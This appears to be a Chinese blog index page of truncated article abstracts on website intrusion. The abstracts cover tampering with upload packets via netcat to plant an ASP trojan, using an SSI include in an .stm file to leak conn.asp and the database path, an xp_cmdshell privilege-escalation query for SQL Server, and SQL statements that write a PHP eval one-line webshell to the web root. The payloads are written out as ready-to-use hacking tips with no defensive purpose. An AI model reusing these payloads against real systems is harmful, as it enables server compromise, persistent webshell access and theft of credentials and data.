摘要：目标:学会抓取上传的数据包文件,并用工具进行修改,学会使用NETCAT(简称NC)提交数据包以及使用工具抓取数据包 要点:我们的电脑被称为客户端,网站称为服务端,上网从网站上获取信息,或者向网站上提交信息,其根本都是客户端和服务端之间信息传递的过程,这个过程以数据包的形式实现的,如果能够抓取到提交的数据包,并进行修改,则可以达到改变在服务器上生成的结果的目的.对数据包进行修改后提交达到攻击的目的,其中一个精典的应用是对上传数据包的修改绕过在服务端的过滤,直接上传脚本木马获得WEBSHELL.首先登陆网站,进入上传页面,用抓包工具选中IE中的这个页面,上传ASP木马,这一次的上传是会失败的,因为 阅读全文

摘要：当网站不允许上传 asp cer cdx htr等文件时, 上传一个stm文件, 内容为: <!--#include file="conn.asp"--> 直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦! 并且又看了那篇shtml的介绍后，恍然大悟，终于明白了！ 原来就是如上所说的， <!--#include file="conn.asp"--> 就是一条SSI指令，其作用是将"info.htm"的内容拷贝到当前的页面中，当访问者来浏览时，会看到其它HTML文档一样显示info.h 阅读全文

摘要：有时候会遇到SA权限不能多句执行的情况，让人很蛋疼。前几天在搞一个SQL SERVER 7.0的PUBLIC权限时。某牛给我以下语句提权select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:''')本机测试成功。但实际环境中却出现[微软] [ODBC SQL Server驱动] [SQL Server中] OLE DB提 阅读全文

摘要：文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行)：Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表，里面就一个cmd字段Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd]);?>'); //把一句话木马插入到temp表Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查 阅读全文